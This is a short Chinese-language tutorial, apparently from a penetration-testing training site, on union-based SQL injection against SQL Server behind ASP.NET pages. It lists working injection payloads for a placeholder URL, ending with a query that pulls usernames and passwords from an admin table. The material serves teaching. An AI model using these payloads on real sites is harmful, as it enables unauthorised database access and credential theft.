[原创]WEB安全第四章SQL注入篇10 sqlserver 联合 注入
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第四章SQL注入篇10 sqlserver 联合 注入
1、简介
sqlserver经常与asp或者aspx一起使用,操作系统多数是win2012 win2018
数据库版本 sql2008 sql2012
http://www.demo1.com/index.aspx?id=1
2、注释符号
–空格 单行注释
/* */ 多行注释
3、判断是否注入
‘ 单引号是否报错
and 1=2
and 1=1
页面是否相同
4、判断列数
order by
http://www.demo1.com/index.aspx?id=1 order by 3
5、联合查询
联合查询 需要每个列的类型要一直 或者可以使用null 直到页面出错。
http://www.demo1.com/index.aspx?id=-1 union select 1,’2′,’3′
http://www.demo1.com/index.aspx?id=-1 union select null,null,null
6、查询系统信息
db_name() 数据库名
@@version 版本信息
User_Name() 当前用户
host_name() 计算机名称
![[原创]WEB安全第四章SQL注入篇10 sqlserver 联合 注入](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
7、查询数据
http://www.demo1.com/index.aspx?id=-1 union select null,username,password from admin
![[原创]WEB安全第四章SQL注入篇10 sqlserver 联合 注入](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/147.html